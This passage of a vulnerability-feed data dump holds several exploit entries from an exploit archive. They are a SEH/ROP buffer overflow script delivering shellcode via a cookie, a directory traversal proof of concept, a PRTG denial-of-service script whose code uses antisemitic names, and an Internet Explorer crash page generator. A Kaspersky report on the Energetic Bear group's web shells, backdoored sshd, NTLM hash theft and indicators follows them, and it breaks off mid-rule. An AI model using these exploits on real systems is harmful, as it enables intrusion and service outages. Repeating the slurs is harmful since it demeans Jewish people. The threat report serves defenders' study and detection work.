struct.pack('<L', 0x10015442)\t # POP EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]\r\n\r\n# EDI = ROP NOP (RETN)\r\nbuffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]\r\n\r\n# EAX = NOP (0x90909090)\r\nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x90909090) # nop\r\nbuffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll]\r\n\r\nbuffer += \"\\x90\" * 50 # nop\r\nbuffer += shellcode # calc.exe\r\nbuffer += \"\\x90\" * 50 # nop\r\n\r\nbuffer += '\\x45' * (1412-(4*88)+128-len(shellcode)-100) \r\nbuffer += '\\x42' * 4 # nSEH filler\r\n\r\n# stack pivot that will land somewhere in buffer of As\r\nbuffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll]\r\n\r\nbuffer += '\\x44' * (5000-4059-4-4)\r\n\r\nprint \"[+] Sending %s bytes of evil payload..\" %len(buffer)\r\ntime.sleep(1)\r\n\r\ntry:\r\n\tcookies = dict(SESSIONID='6771', 
UserID=buffer,PassWD='')\r\n\tdata=dict(frmLogin='',frmUserName='',frmUserPass='',login='')\r\n\trequests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)\r\nexcept:\r\n\tprint \"The server stopped responding. You should see calc.exe by now ;D\"\n\n# 0day.today [2018-04-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30243"}, {"lastseen": "2018-04-23T20:02:35", "references": [], "description": "Exploit for windows platform in category web applications", "edition": 1, "reporter": "Javier Bernardo", "published": "2018-04-23T00:00:00", "title": "Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10201"], "modified": "2018-04-23T00:00:00", "id": "1337DAY-ID-30225", "href": "https://0day.today/exploit/description/30225", "sourceData": "# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability\r\n# Software Vendor: NComputing\r\n# Software Link: \r\n# Author: Javier Bernardo\r\n# CVE: CVE-2018-10201\r\n# Category: Webapps\r\n \r\n#[Description]\r\n#\r\n#It is possible to read arbitrary files outside the root directory of\r\n#the web server. This vulnerability could be exploited remotely by a\r\n#crafted URL without credentials, with .../ or ...\\ or ..../ or ....\\ as a\r\n#directory-traversal pattern to TCP port 8667.\r\n#\r\n#An attacker can make use of this vulnerability to step out of the root\r\n#directory and access other parts of the file system. 
This might give\r\n#the attacker the ability to view restricted files, which could provide\r\n#the attacker with more information required to further compromise the system.\r\n \r\n#[PoC]\r\n \r\nnmap -p T:8667 -Pn your_vSpace_server\r\n \r\nNmap scan report for your_vSpace_server (x.x.x.x)\r\nHost is up (0.044s latency).\r\n \r\nPORT STATE SERVICE\r\n8667/tcp open unknown\r\n \r\nhttp://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini\r\n \r\nhttp://your_vSpace_server:8667/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini\r\n \r\nhttp://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini\r\n \r\nhttp://your_vSpace_server:8667/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini\n\n# 0day.today [2018-04-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30225"}, {"lastseen": "2018-04-23T20:02:40", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 1, "reporter": "luriel", "published": "2018-04-23T00:00:00", "title": "PRTG Network Monitor < 18.1.39.1648 - Stack Overflow Denial of Service Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10253"], "modified": "2018-04-23T00:00:00", "id": "1337DAY-ID-30229", "href": "https://0day.today/exploit/description/30229", "sourceData": "# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow\r\n# Exploit Author: Lucas \"luriel\" Carmo\r\n# Vendor Homepage: https://www.paessler.com/prtg\r\n# Software Link: https://www.paessler.com/download/prtg-download\r\n# Version: 18.1.39.1648\r\n# CVE : CVE-2018-10253\r\n# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5\r\n# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/\r\n \r\n#!/usr/bin/python\r\n \r\nimport requests\r\nimport sys\r\nimport os\r\nimport re\r\nimport socket\r\n 
\r\ngreen = \"\\033[1;32m\"\r\nyellow = '\\033[1;33m'\r\nnormal = '\\033[0;0m'\r\nbanner = \"\"\"\r\n \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557\r\n \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2551\r\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551 \u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\r\n\u2588\u2588 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551\u2588\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551 
\u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\r\n\u255a\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2554\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u255a\u2550\u255d \u2588\u2588\u2551\r\n \u255a\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u255d\u255a\u2550\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\r\n\"\"\"\r\n \r\n \r\nbanner2 = \"\"\"\r\n Author: @Lucas \"luriel\" Carmo\r\n\"\"\"\r\n \r\nos.system('clear')\r\n \r\nprint(green+banner)\r\nprint(yellow+banner2)\r\nprint(normal)\r\n \r\ndef check_http(url):\r\n pattern = re.compile(\"http://\")\r\n return re.search(pattern, url)\r\n \r\ndef sanitize_url(url):\r\n if(not check_http(url)):\r\n return \"http://\" + url\r\n return url\r\n \r\ndef check_server(url):\r\n r = requests.get(url, timeout=4)\r\n code = r.status_code\r\n \r\ndef send_jewish_payload(url):\r\n payload = {'file':'addmap.htm'}\r\n r = requests.post(url, params=payload)\r\n \r\ndef main():\r\n try:\r\n if len(sys.argv) <= 3 and len (sys.argv) >= 2:\r\n try:\r\n url = sanitize_url(sys.argv[1])\r\n print(' [#] LOADING!')\r\n if (check_server(url) != 404):\r\n send_jewish_payload(url)\r\n else:\r\n print(' [!] Server shutdown or not found')\r\n except requests.exceptions.ConnectionError:\r\n print(' [~] BOOOOOM! 
PRTG Server has been exploded!')\r\n except requests.exceptions.InvalidURL:\r\n print(' [!] Invalid URL')\r\n except requests.exceptions.Timeout:\r\n print(' [!] Connection Timeout\\n')\r\n else:\r\n print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')\r\n except KeyboardInterrupt:\r\n print(' [!] Jewish Napalm Canceled;.....[./]')\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-04-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30229"}, {"lastseen": "2018-04-22T22:06:22", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 1, "reporter": "hyp3rlinx", "published": "2018-04-22T00:00:00", "title": "Microsoft Internet Explorer 11.371.16299.0 Denial Of Service Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-04-22T00:00:00", "id": "1337DAY-ID-30219", "href": "https://0day.today/exploit/description/30219", "sourceData": "[+] Credits: John Page (aka hyp3rlinx) \r\n\r\nVendor:\r\n=======\r\nwww.microsoft.com\r\n\r\n\r\nProduct:\r\n========\r\nInternet Explorer (Windows 10)\r\nv11.371.16299.0\r\n\r\nInternet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.\r\n\r\n\r\nVulnerability Type:\r\n==================\r\nDenial Of Service\r\n\r\n\r\nCVE Reference:\r\n==============\r\nN/A\r\n\r\n\r\nSecurity Issue:\r\n================\r\nA null pointer de-reference (read) results in an Internet Explorer denial of service (crash) when MSIE encounters a specially crafted\r\nHTML HREF tag containing an empty reference for certain Windows file types. Upon the IE crash it will at times attempt to restart itself;\r\nif that occurs and the user is prompted by IE to restore their browser session, then selecting this option has, so far in my tests, repeated the\r\ncrash all over again. 
This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser.\r\n\r\nReferencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :)\r\n\r\nTested Windows 10 \r\n\r\nStack Dump:\r\n==========\r\n(2e8c.27e4): Access violation - code c0000005 (first/second chance not available)\r\nntdll!NtWaitForMultipleObjects+0x14:\r\n00007ffa`be5f0e14 c3 ret\r\n0:015> r\r\nrax=000000000000005b rbx=0000000000000003 rcx=0000000000000003\r\nrdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003\r\nrip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000\r\n r8=0000000000000000 r9=0000000000000000 r10=0000000000000000\r\nr11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\r\nntdll!NtWaitForMultipleObjects+0x14:\r\n00007ffa`be5f0e14 c3 ret\r\n\r\nCONTEXT: (.ecxr)\r\nrax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000\r\nrdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000\r\nrip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600\r\n r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398\r\nr11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060\r\nr14=0000000000000002 r15=0000000000000001\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nKERNELBASE!StrCmpICW+0x6:\r\n00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=????\r\nResetting default scope\r\n\r\nFAULTING_IP: \r\nKERNELBASE!StrCmpICW+6\r\n00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]\r\n\r\nEXCEPTION_RECORD: (.exr -1)\r\nExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)\r\n ExceptionCode: c0000005 (Access violation)\r\n ExceptionFlags: 00000000\r\nNumberParameters: 2\r\n Parameter[0]: 0000000000000000\r\n Parameter[1]: 
0000000000000000\r\nAttempt to read from address 0000000000000000\r\n\r\nDEFAULT_BUCKET_ID: NULL_POINTER_READ\r\nPROCESS_NAME: iexplore.exe\r\n\r\n\r\n\r\nPOC video URL:\r\n==============\r\nhttps://vimeo.com/265691256/\r\n\r\n\r\n\r\nExploit/POC:\r\n============\r\n1) Run below python script to create \"IE-Win10-Crasha.html\"\r\n2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10\r\n\r\npayload=('<br>\\n'+\r\n'<center>MSIE v11.371.16299 Denial Of Service by hyp3rlinx <br>\\n'+\r\n'<a href=\".cmd:\" id=\"hate\">crashy ware shee</a>\\n'+\r\n'<br>\\n'+\r\n'Tested successfully on Windows 10\\n'+\r\n'</center><script>\\n'\r\n'function doit(){\\n'+\r\n'document.getElementById(\"hate\").click();\\n'\r\n'alert(\"DOH!\");\\n'+\r\n'obj.click();\\n'+\r\n'obj.click();\\n'+\r\n'}\\n'+\r\n'setInterval(\"doit()\", 2000)\\n'+\r\n'</script>')\r\n\r\nfile=open(\"IE-Win10-Crasha.html\",\"w\")\r\nfile.write(payload)\r\nfile.close()\r\n\r\nprint 'MS InternetExplorer (Win 10) '\r\nprint 'Denial Of Service File Created.'\r\nprint 'hyp3rlinx'\r\n\r\n\r\n\r\n\r\nNetwork Access:\r\n===============\r\nRemote\r\n\r\n\r\n\r\nSeverity:\r\n=========\r\nMedium\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n=============================\r\nVendor Notification: April 18, 2018\r\nvendor closes thread : April 19, 2018\r\nApril 20, 2018 : Public Disclosure\n\n# 0day.today [2018-04-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30219"}], "securelist": [{"lastseen": "2018-04-25T18:41:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "\n\n[_Energetic Bear/Crouching Yeti_](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080817/EB-YetiJuly2014-Public.pdf>)_ is a widely known APT group active since at least 2010. The group tends to attack different companies with a strong focus on the energy and industrial sectors. 
Companies attacked by Energetic Bear/Crouching Yeti are geographically distributed worldwide with a more obvious concentration in Europe and the US. In 2016-2017, the number of attacks on companies in Turkey increased significantly. _\n\n_The main tactics of the group include sending phishing emails with malicious documents and infecting various servers. The group uses some of the infected servers for auxiliary purposes \u2013 to host tools and logs. Others are deliberately infected to use them in waterhole attacks in order to reach the group's main targets. _\n\n_Recent activity of the group against US organizations was discussed in a _[_US-CERT_](<https://www.us-cert.gov/ncas/alerts/TA18-074A>)_ advisory, which linked the actor to the Russian government, as well as an advisory by the _[_UK National Cyber Security Centre_](<https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control>)_. _\n\n_This report by _[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_ presents information on identified servers that have been infected and used by the group. The report also includes the findings of an analysis of several webservers compromised by the Energetic Bear group during 2016 and in early 2017_.\n\n## Attack victims\n\nThe table below shows the distribution of compromised servers (based on the language of website content and/or the origins of the company renting the server at the time of compromise) by countries, attacked company types and the role of each server in the overall attack scheme. Victims of the threat actor's attacks were not limited to industrial companies.\n\n**Table 1. 
Compromised servers**\n\n**Country** | **Description** | **Role in the attack** \n---|---|--- \n**Russia** | Opposition political website | Waterhole \n**Russia** | Real estate agency | Auxiliary (collecting user data in the waterhole attack) \n**Russia** | Football club | Waterhole \n**Russia** | Developer and integrator of secure automation systems and IS consultant | Waterhole \n**Russia** | Developers of software and equipment | Auxiliary (collecting user data in the waterhole attack, tool hosting) \n**Russia** | Investment website | Auxiliary (collecting user data in the waterhole attack) \n**Ukraine** | Electric power sector company | Waterhole \n**Ukraine** | Bank | Waterhole \n**UK** | Aerospace company | Waterhole \n**Germany** | Software developer and integrator | Waterhole \n**Germany** | Unknown | Auxiliary (collecting user data in the waterhole attack) \n**Turkey** | Oil and gas sector enterprise | Waterhole \n**Turkey** | Industrial group | Waterhole \n**Turkey** | Investment group | Waterhole \n**Greece** | Server of a university | Auxiliary (collecting user data in the waterhole attack) \n**USA** | Oil and gas sector enterprise | Waterhole \n**Unknown** | Affiliate network site | Auxiliary (collecting user data in the waterhole attack) \n \n## Waterhole\n\nAll waterhole servers are infected following the same pattern: a link using the file scheme, file://IP/filename.png, is injected into a web page or JS file.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-1.png>)\n\n_Injected link with the file scheme_\n\nThe link makes the browser request an image from that path, as a result of which the user's machine connects to the remote server over the SMB protocol and attempts NTLM authentication to it. 
In this attack type, the attackers' goal is to extract the following data from the session:\n\n * user IP,\n * user name,\n * domain name,\n * Net-NTLM challenge-response hash derived from the user's password (not the raw NT hash; it must be cracked offline to recover the password).\n\nIt should be noted that the image requested using the link is not physically located on the remote server.\n\n## Scanned resources\n\nCompromised servers are in some cases used to conduct attacks on other resources. In the process of analyzing infected servers, numerous websites and servers were identified that the attackers had scanned with various tools, such as nmap, dirsearch, sqlmap, etc. (tool descriptions are provided below).\n\n**Table 2. Resources that were scanned from one of the infected servers**\n\n**Country (based on the content)** | **Description** \n---|--- \n**Russia** | Non-profit organization \n**Russia** | Sale of drugs \n**Russia** | Travel/maps \n**Russia** | Resources based on the Bump platform (platform for corporate social networks) \u2013 non-profit organization, social network for college/university alumni, communication platform for NGOs, etc. \n**Russia** | Business \u2013 photographic studio \n**Russia** | Industrial enterprise, construction company \n**Russia** | Door manufacturing \n**Russia** | Cryptocurrency exchange \n**Russia** | Construction information and analysis portal \n**Russia** | Personal website of a developer \n**Russia** | Vainah Telecom IPs and Subnets (Chechen Republic) \n**Russia** | Various Chechen resources (governmental organizations, universities, industrial enterprises, etc.) \n**Russia** | Web server with numerous sites (alumni sites, sites of industrial and engineering companies, etc.) \n**Russia** | Muslim dating site \n**Brazil** | Water treatment \n**Turkey** | Hotels \n**Turkey** | Embassy in Turkey \n**Turkey** | Software developer \n**Turkey** | Airport website \n**Turkey** | City council website \n**Turkey** | Cosmetics manufacturer \n**Turkey** | Religious website \n**Turkey** | Turktelekom subnet with a large number of sites \n**Turkey** | Telnet Telecom subnet with a large number of sites \n**Georgia** | Personal website of a journalist \n**Kazakhstan** | Unknown web server \n**Ukraine** | Office supplies online store \n**Ukraine** | Floral business \n**Ukraine** | Image hosting service \n**Ukraine** | Online course on sales \n**Ukraine** | Dealer of farming equipment and spare parts \n**Ukraine** | Ukrainian civil servant's personal website \n**Ukraine** | Online store of parts for household appliance repair \n**Ukraine** | Timber sales, construction \n**Ukraine** | Tennis club website \n**Ukraine** | Online store for farmers \n**Ukraine** | Online store of massage equipment \n**Ukraine** | Online clothes store \n**Ukraine** | Website development and promotion \n**Ukraine** | Online air conditioner store \n**Switzerland** | Analytical company \n**US** | Web server with many domains \n**France** | Web server with many domains \n**Vietnam** | Unknown server \n**International** | Flight tracker \n \nThe sites and servers on this list do not seem to have anything in common. 
Even though the scanned servers do not necessarily look like potential final victims, it is likely that the attackers scanned different resources to find a server that could be used to establish a foothold for hosting the attackers' tools and, subsequently, to develop the attack.\n\nPart of the sites scanned may have been of interest to the attackers as candidates for hosting waterhole resources.\n\nIn some cases, the domains scanned were hosted on the same server; sometimes the attackers went through the list of possible domains matching a given IP.\n\nIn most cases, multiple attempts to compromise a specific target were not identified \u2013 with the possible exception of sites on the Bump platform, flight tracker servers and servers of a Turkish hotel chain.\n\nCuriously, the sites scanned included a web developer's website, kashey.ru, and resources links to which were found on this site. These may have been links to resources developed by the site's owner: [www.esodedi.ru](<http://www.esodedi.ru>), [www.i-stroy.ru](<http://www.i-stroy.ru>), [www.saledoor.ru](<http://www.saledoor.ru>)\n\n## Toolset used\n\n### Utilities\n\nUtilities found on compromised servers are open-source and publicly available on GitHub:\n\n * Nmap \u2013 an open-source utility for analyzing the network and verifying its security.\n * [Dirsearch](<https://github.com/maurosoria/dirsearch>) \u2014 a simple command-line tool for brute forcing (performing exhaustive searches of) directories and files on websites.\n * [Sqlmap](<https://github.com/sqlmapproject/sqlmap>) \u2014 an open-source penetration testing tool, which automates the process of identifying and exploiting SQL injection vulnerabilities and taking over database servers.\n * [Sublist3r](<https://github.com/aboul3la/Sublist3r>) \u2014 a tool written in Python designed to enumerate website subdomains. The tool uses open-source intelligence ([OSINT](<https://ru.wikipedia.org/wiki/OSINT>)). 
Sublist3r supports many different search engines, such as Google, Yahoo, Bing, Baidu and Ask, as well as such services as Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. The tool helps penetration testers to collect information on the subdomains of the domain they are researching.\n * [Wpscan](<https://github.com/wpscanteam/wpscan>) \u2014 a WordPress vulnerability scanner that uses the blackbox principle, i.e., works without access to the source code. It can be used to scan remote WordPress sites in search of security issues.\n * [Impacket](<https://github.com/CoreSecurity/impacket>) \u2014 a toolset for working with various network protocols, which is required by SMBTrap.\n * [SMBTrap](<https://github.com/CylanceSPEAR/SMBTrap>) \u2014 a tool for logging data received over the SMB protocol (user IP address, user name, domain name, password NTLM hash).\n * [Commix](<https://github.com/commixproject/commix>) \u2014 a vulnerability search and command injection and exploitation tool written in Python.\n * [Subbrute](<https://github.com/TheRook/subbrute>) \u2013 a subdomain enumeration tool available for Python and Windows that uses an open name resolver as a proxy and does not send traffic to the target DNS server.\n * [PHPMailer](<https://github.com/PHPMailer/PHPMailer>) \u2013 a mail sending tool.\n\nIn addition, a custom Python script named ftpChecker.py was found on one of the servers. 
The script was designed to check FTP hosts from an incoming list.\n\n### Malicious PHP files\n\nThe following malicious PHP files were found in different directories in the nginx folder and in a working directory created by the attackers on the infected web servers:\n\n**File name** | **Brief description** | **md5sum** | **Time of the latest file change (MSK)** | **Size, bytes** \n---|---|---|---|--- \nini.php | wso shell + mail | f3e3e25a822012023c6e81b206711865 | 2016-07-01 15:57:38 | 28786 \nmysql.php | wso shell + mail | f3e3e25a822012023c6e81b206711865 | 2016-06-12 13:35:30 | 28786 \nopts.php | wso shell | c76470e85b7f3da46539b40e5c552712 | 2016-06-12 12:23:28 | 36623 \nerror_log.php | wso shell | 155385cc19e3092765bcfed034b82ccb | 2016-06-12 10:59:39 | 36636 \ncode29.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 11:10:40 | 10724 \nproxy87.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 14:31:13 | 10724 \ntheme.php | wso shell | 2292f5db385068e161ae277531b2e114 | 2017-05-16 17:33:02 | 133104 \nsma.php | PHPMailer | 7ec514bbdc6dd8f606f803d39af8883f | 2017-05-19 13:53:53 | 14696 \nmedia.php | wso shell | 78c31eff38fdb72ea3b1800ea917940f | 2017-04-17 15:58:41 | 1762986 \n \nIn the table above:\n\n * Web shell is a script that allows remote administration of the machine.\n * WSO is a popular web shell and file manager (it stands for \"Web Shell by Orb\") that has the ability to masquerade as an error page containing a hidden login form. 
It is available on GitHub:\n\n<https://github.com/wso-shell/WSO>\n\nTwo of the PHP scripts found, ini.php and mysql.php, contained a WSO shell concatenated with the following email spamming script:\n\n<https://github.com/bediger4000/php-malware-analysis/tree/master/db-config.php>\n\nAll the scripts found are obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124233/180418-energetic-bear-crouching-yeti-2.png>)\n\n_wso shell \u2013 error_log.php_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-3.png>)\n\n_Deobfuscated wso shell \u2013 error_log.php_\n\nOne of the web shells was found on the server under two different names (proxy87.php and code29.php). It uses the eval function to execute a command sent via HTTP cookies or a POST request:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-4.png>)\n\n_Web shell \u2013 proxy87.php_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-5.png>)\n\n_Deobfuscated web shell \u2013 proxy87.php_\n\n### Modified sshd\n\nA modified sshd with a preinstalled backdoor was found in the process of analyzing the server.\n\nPatches with some versions of backdoors for sshd that are similar to the backdoor found are available on GitHub, for example:\n\n<https://github.com/jivoi/openssh-backdoor-kit>\n\nCompilation is possible on any OS with binary compatibility.\n\nAs a result of replacing the original sshd file with a modified one on the infected server, an attacker can use a 'master password' to get authorized on the remote server, while leaving minimal traces (compared to an ordinary user connecting via ssh).\n\nIn addition, the modified sshd logs all legitimate ssh connections (this does not apply to the connection that uses the 'master password'), including 
connection times, account names and passwords. The log is encrypted and is located at /var/tmp/.pipe.sock.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-6.png>)\n\n_Decrypted log at /var/tmp/.pipe.sock_\n\n## Activity of the attackers on compromised servers\n\nIn addition to using compromised servers to scan numerous resources, other attacker activity was also identified.\n\nAfter gaining access to the server, the attackers installed the tools they needed at different times. Specifically, the following commands for third-party installations were identified on one of the servers:\n\n * apt install traceroute\n * apt-get install nmap\n * apt-get install screen\n * git clone https://github.com/sqlmapproject/sqlmap.git\n\nAdditionally, the attackers installed any packages and tools for Python they needed.\n\nThe diagram below shows times of illegitimate logons to one of the compromised servers during one month. The attackers checked the smbtrap log file on working days. In most cases, they logged on to the server at roughly the same time of day, probably in the morning hours:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-7.png>)\n\n_Times of illegitimate connections with the server (GMT+3)_\n\nIn addition, in the process of performing the analysis, an active process was identified that exploited SQL injection and collected data from a database of one of the victims.\n\n## Conclusion\n\nThe findings of the analysis of compromised servers and the attackers' activity on these servers are as follows:\n\n 1. With rare exceptions, the group's members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group 'markers' very difficult.\n 2. 
Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.\n 3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.\n 4. The diversity of victims may indicate the diversity of the attackers' interests.\n 5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack's further development.\n\n## Appendix I \u2013 Indicators of Compromise\n\n### Filenames and Paths\n\n#### Tools*\n\n/usr/lib/libng/ftpChecker.py \n/usr/bin/nmap/ \n/usr/lib/libng/dirsearch/ \n/usr/share/python2.7/dirsearch/ \n/usr/lib/libng/SMBTrap/ \n/usr/lib/libng/commix/ \n/usr/lib/libng/subbrute-master/ \n/usr/share/python2.7/sqlmap/ \n/usr/lib/libng/sqlmap-dev/ \n/usr/lib/libng/wpscan/ \n/usr/share/python2.7/wpscan/ \n/usr/share/python2.7/Sublist3r/\n\n*Note that these tools can also be used by other threat actors.\n\n#### PHP files:\n\n/usr/share/python2.7/sma.php \n/usr/share/python2.7/theme.php \n/root/theme.php \n/usr/lib/libng/media.php\n\n#### Logs\n\n/var/tmp/.pipe.sock\n\n### PHP file hashes\n\nf3e3e25a822012023c6e81b206711865 \nc76470e85b7f3da46539b40e5c552712 \n155385cc19e3092765bcfed034b82ccb \n1644af9b6424e8f58f39c7fa5e76de51 \n2292f5db385068e161ae277531b2e114 \n7ec514bbdc6dd8f606f803d39af8883f \n78c31eff38fdb72ea3b1800ea917940f\n\n### Yara rules\n\nrule Backdoored_ssh { \nstrings: \n$a1 = \"OpenSSH\" \n$a2 = \"usage: ssh\" \n$a3 = \"HISTFILE\" \ncondition: 